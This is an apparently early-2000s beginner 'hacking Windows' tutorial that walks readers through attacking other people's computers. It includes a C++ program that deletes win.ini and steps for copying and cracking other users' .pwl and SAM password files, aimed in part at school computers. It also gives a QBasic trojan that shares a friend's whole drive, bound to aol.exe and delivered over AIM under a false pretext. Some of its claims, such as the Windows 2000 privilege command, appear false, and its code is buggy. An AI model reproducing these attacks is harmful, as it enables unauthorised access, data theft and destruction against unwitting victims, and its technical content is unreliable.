Hacking Windows for The Complete Newbie Part 1 By: SLIPStream (formerly known as Morbos or Dynamite) Contact information located at the end of the file. (Please note: Newbie is not meant to be used as a put down. All great hackers were once newbies so please dont get POed) :) WARNING: This file contains some elements which are considered illigal in most countries including the united states. The author assumes no responsiblity for the actions of the reader after reading this file. The reader hereby understands that the file is for educational purposes ONLY. The author does not encourage illigal activity and cannot be held responsible for the readers actions. If you agree to this, procede in reading the file, otherwise, please exit now. Lesson 1: The Windows FileSystem Ok. Unless you know virtualy nothing about hacking, skip this lesson, it is only meant to be used for the very beginners k? Thanks alot. Heres the layout of the windows filesystem: C:\ <--- Can be replaced with any other drive letter eg: e, f, a, b |_ > C:\windows > \_> System Files > \_> Other files used by windows > \_> Dont delete anything in here. > C:\Program Files > \_> Used by programs > \_> Dont alter these unless you want to > > Uninstall them > \_> .dll files stored here for programs > C:\DOS > \_> This directory only exists on REAALLY old > \_> Windows systems ie: win95 in its early editions > \_> or win 3.1 (i hope nobody still has that.) Easy enough eh? Open up My Computer and click on C:\ or whatever your main drive is. Explore it, and when your ready, move on to the next lesson. Lesson 2: Exploiting Windows Windows is so cruddy, even someone new to computers could mess with it! Lets start. Ok, first you need to know some file extentions: .exe an executable file .bat a batch file (full of dos commands) .html an html file used for webpages .htm ' ditto ' .dll a dynamic link library file. used for program instructions .obj object file, used for compiling (dont worry about it right now) .jpg an image file .bmp ' ditto ' .gif ' ditto ' or an animated image file .mp3 sound file .wav older sound file .mpg video file .swf a flash video file (neat) You can find lots more. If your not getting all this, you probably want to get windows for dummies. Its available at barns and nobles pretty cheap in the computer section. Ok. Procede ONLY if you understand all this otherwise you'll screw your computer over. First of all download a c/c++ compiler. If you dont know what that is then dont procede. Once you know how to compile stuff and write some simple programs, go to the next subsection (A). A: Your first exploitation. Ok, put this into your c++ compiler. /* This program will completely kill windows so DO NOT run it */ #include #include #include #include using namespace std; void pause(); void destroy(); int main() { cout << "This will destroy your computer.\n"; cout << "Are you sure you want to continue???\n"; cout << "If not, click X now.\n"; pause(); cout << "Are you really really sure??? \n"; pause(); destroy(); return 0; } void pause() { system("pause"); } void destroy() { system("if exist c:\win.ini del c:\win.ini else echo ."); system("if exist c:\windows.ini del c:\windows.ini else echo ."); } Compile it and build/link it. DO NOT RUN IT!!! If you run this and press enter twice it will kill your computer. What does this do??? First of all: /* This program will completely kill windows so DO NOT run it */ Is nothing but a statement. The compiler disregards it. Then: #include #include #include #include These statements are calling header files. Header files contain the information used to call c/c++ commands. void pause(); void destroy(); To use a function other than main, you must declare it so that the system can allocate memory for it. int main() { cout << "This will destroy your computer.\n"; cout << "Are you sure you want to continue???\n"; cout << "If not, click X now.\n"; pause(); cout << "Are you really really sure??? \n"; pause(); destroy(); return 0; } This is the main program where we call the other functions. void pause() { system("pause"); } This is the pause function. Here we used the dos command pause which is called from the main program. void destroy() { system("if exist c:\win.ini del c:\win.ini else echo ."); system("if exist c:\windows.ini del c:\windows.ini else echo ."); } This is the main part of the program where it deletes the win.ini file on XP/NT/2000 or windows.ini on win3x or win9x (3.1 is 3x, and win95/98/2000 are 9x). I strongly do not advise running this program. If you cannot see why then you need to learn more about c++. If all this was too complecated for you you could write it in QBasic, which requires downloading another compiler (this one is small so you can download it on 56k dialup). B: Breaking into the library exploit I call this the breaking into the library exploit because it lets you break into anyones account on a windows machine but only allows read access. (quick lesson on access: read: users can only read from the file, but cannot write to write: users can write to the file no access: users cannot read or write to the file. ) Ok. Open up the DOS prompt. (You need to know some dos commands to use this exploit). When the prompt comes up type this: c:\windows> cd c:\windows\profiles Do not type the c:\windows> part, this only represents the command prompt. Now type: c:\windows\profiles> dir (Notice \profiles has now been added to c:\windows) Something like this should come up: 12/18/2003 05:52 AM . 12/18/2003 05:52 AM .. 12/17/2003 07:04 PM administrator 11/17/2003 09:16 PM All Users 12/04/2003 03:59 PM funnyguy 12/20/2003 06:33 AM anotheruser 12/27/2003 10:44 PM someuser 0 File(s) 0 bytes 7 Dir(s) 3,671,572,480 bytes free Well, this gives you an idea on who is on the computer. Now type: c:\windows\profiles> cd funnyguy c:\windows\profiles\funnyguy> dir |more Something like this will come up: Volume in drive C has no label. Volume Serial Number is ECB8-7534 Directory of E:\Documents and Settings\funnyguy 12/27/2003 10:44 PM . 12/27/2003 10:44 PM .. 11/18/2003 05:58 PM .java 11/22/2003 12:30 AM .jpi_cache 11/19/2003 08:57 PM .limewire 12/26/2003 12:25 AM 697 .plugin141_05.trace 12/24/2003 01:53 PM 4,754 ac3dprefs.txt 12/18/2003 01:30 PM 0 annoy.cpp 12/17/2003 04:52 PM 42,967 arena.cpp 12/17/2003 04:52 PM 3,389 arena.dsp 12/17/2003 04:52 PM 535 arena.dsw 12/17/2003 04:52 PM 34,026 arena.h 12/17/2003 04:52 PM 33,792 arena.ncb 12/17/2003 04:52 PM 48,640 arena.opt 12/17/2003 04:52 PM 1,278 arena.plg 12/16/2003 06:23 PM attacker 12/27/2003 07:19 PM AWSGuitarTuner_Windows 12/16/2003 06:15 PM battlepong 12/17/2003 04:30 PM cheat260 12/17/2003 04:22 PM crypt3 12/23/2003 09:07 PM dc_40_stand_eng 12/25/2003 10:28 AM Debug 12/28/2003 12:26 AM Desktop 12/15/2003 06:31 PM Favorites 12/16/2003 06:15 PM fedup 12/16/2003 04:49 PM grok 12/16/2003 07:03 PM hacker1_1 12/27/2003 09:27 PM Ktulu40 12/17/2003 05:07 PM midiedit 12/17/2003 04:40 PM musiced 12/28/2003 12:27 PM My Documents Hmm? Whats all this??? His/Her personal files???!!! Do a little browsing. WINDOWS XP USERS READ THIS: Windows XP/NT has better security than 9x from the dos console, but this same exploit can be applied by doing it from explorer. Open up Internet Explorer (or whatever web browser you use), and in the adress bar type: c:\documents and settings Then press enter. Ah. There we are! The same thing, but graphical! Lesson 3: Starting to get a little more technical. Ok, you know how to break into windows the easy way. But you dont have write access. Or maybe you want to break into some school computers but these exploits wont work. Lets get started! There are two vital file types to logging in on windows: .pwl and SAM The .pwl files contain much weaker encryption than the SAM file, so it will be easier to obtain them and crack them than the SAM file. Ok, heres how you do it. If the computer/s you want to hack have windows 3x or 9x on them, you can use this exploit: Step 1: Insert a blank floppy into the drive. Step 2: Start -> Run -> command -> press enter. Step 3: c:\windows> copy c:\windows\*.pwl a:\ Step 4: Crack them with Cain and Abel password cracker and you've just broken into some accounts. Wait! How did you do that? Ok, heres the overview of the exploit. All the users password files are contained in their own little .pwl file (ie: john.pwl, sally.pwl, funnyguy.pwl). But you cant just go and read these files. They're encrypted so they cant be read. However, there are programs out there that can break these filetypes. Go to http://www.google.com and type 'cain and able password cracker' The website should be one of the first ones on the list. When you get to their website, download the Cain and Abel password cracker and get to work. It usualy takes 1 - 2 hours to crack the password files depending on how big the password is. First the cracker tries all these words out of its dictionary to try and find single word passwords. If none of the words in its dictionary are passwords (there are thousands of words in there), then it brute forces the password file (tries a, then b, etc.) Thats how you break into an account on 9x. Heres how you do it on xp/NT. What is the SAM file? The Sam file is the file containing the encrypted passwords of all the users on the system. Unlike win 9x where all users have seperate .pwl files, the SAM file contains all the users pwl. Basicly, if you have access to the sam file, you win. The sam file is actualy hidden (Much better security then 9x), but when settings are changed on the computer, the sam file is updated and moved to a new directory accessable to any user. The folder is E:\WINDOWS\system32\config If the SAM file isn't there and you have access to the machine at the console then you can run a search for the SAM file. Open the Start Menu, click Search, then click on All Files, and type the Query as 'SAM'. It will run you through some boring sample files that windows provides, then somewhere in the middle it will have a file simply named 'sam', no file extention. Right click on it and click 'Open Containing Folder'. You should see the sam file in there along with lots of other configuration files. Put your floppy in there, right click on 'sam' and click Send to-> Floppy (A:\). In a few seconds you should have your encrypted password file. BUT! You cannot use Cain and Abel to crack this one. Instead, a new program is required. The Program is called L0phtCrack. Download the trial version from http://www.atstake.com and crack that sam file. This will generaly take longer than the .pwl files since all the users passwords are combined into one file. Windows 2000 Vulnerability: If you have access to a machine running windows 2000 and have limited access to it, there is a simple command you can use to make it give you Super-User privilages on the command prompt. Type: C:\ netddemsg -s Chat$ cmd.exe You should now have super user privilages on a 2000 machine! Lesson 4: Viruses, Trojans, and Worms (oh my! :) ) This section contains code that can damage or destroy your computer. Please do not use any of the information contained in this section. It is only for educational purposes. Ok, pretend you dont want any privilages on a persons machine, but you just want to screw it up or play a prank on them. How do you do this? Pretend the person has AOL (The crappiest isp out there) and they have windows xp. Lets write some code in QBasic. (Note: No matter what people say, QBasic is the coolest programing language (besides java and c++) out there). Heres the code for file 1: rem '#############Start Copying############## print "Please wait while AOL is updated... " shell "cd\windows" open "win.ini" for output as #1 let loop# = 0 dim line1 as string dim line1 as string dim line3 as string line1 = "[WAOL]" line2 = "AppPath=E:\Program Files\America Online 9.0" line3 = "SharedPath=E:\" dim blank as string blank = " " print #1, line1 print #1, line2 print #1, line3 while loop# < 200 print #1, blank wend rem '#############Stop Copying###############' Save the file as update.bas then compile it under qbasic. Ok, now you need a copy of the america online main file, just use the aol exe file (C:\program files\America Online 9.0\aol.exe). Install aol 9.0 optimized using one of those crappy aol disks you have then copy aol.exe to your desktop. Copy update.exe (the compiled version of update.bas) to your desktop. Now download a file binder. You can get one from http://www.hackers.com in their file archive, or you can get one from http://www.astalavista.com Either one has some good file binders. You can also do a google search for one. Once you have your file binder, have it bind aol.exe and update.exe together, where as update.exe runs in the background and is not shown on the task bar. Name the binded file game.exe or fun.exe, maybe even screensaver.exe. Be creative. Now comes the fun part! Talk to your friend on aim and get him/her to let you send him/her the file. Tell them that it is some game or screen save that they like and want. Be persuasive and convincing. When they agree you can open a direct link from your computer to theirs from aim. This will alow you to send the file. Before you send it open up your command prompt and WITHOUT PRESSING ENTER type c:\windows> netstat -r Go back to aim, and be prepared to jump to the command prompt. Send the file to your friend and quickly click on the command prompt to maximize it and press enter!!! If you have a fast connection, it will have gotten the IP adress of your friend. This IP adress is what will be used to break in. What was all this for??? An IP address (Internet Protocol Address) is how your computer is identified on the internet. It should look something like this: 65.45.12.54 By obtaining the ip adress of your friend, you have found where his computer is located on the internet. The program you wrote shares your friends entire hard drive allowing you to do anything you want with it, upload, download, see if your friend has been looking at naughty things on the internet and whatnot. The peice of code that made all this possible was: SharedPath=E:\ Normaly, AOL shares its folder E:\Program Files\Common Files\AOLSHARE Which is the AOL shared folder (doi :) ). Its not much help to only have that folder shared, but now you have the entire hard disk shared. If you want to, you could do whatever you want to his hard drive. How do I find stuff they've been doing? Well, there are several folders containing the history and past of the computer. First of all comes history. This is located in C:\Documents and Settings\username\Recent If you dont know what username your friend is under go to c:\documents and settings and find out. You cant just look at the cookies (accept for under 9x). You need to open up their internet explorer: E:\Program Files\Internet Explorer\IExplore.exe and click on cookies. Im not gonna cover all this right now. I Hope this file was alot of help and enough to get you started! Have fun, and dont get caught! Contact information: E-Mail: blackfire@dangerous-minds.com <- please use this one blackfire@phayze.com morbos@white-star.com For Other information: slipstream_node@yahoo.com Website: dataflux.cjb.net My Email Service: Please request an account. I dont want to overload my disk quota. Please contact me to request an account. Unauthorized accounts will be deleted. http://wwww.mysticism.zzn.net (username@mysticism.zzn.net) Yahoo IM: SLIPStream_node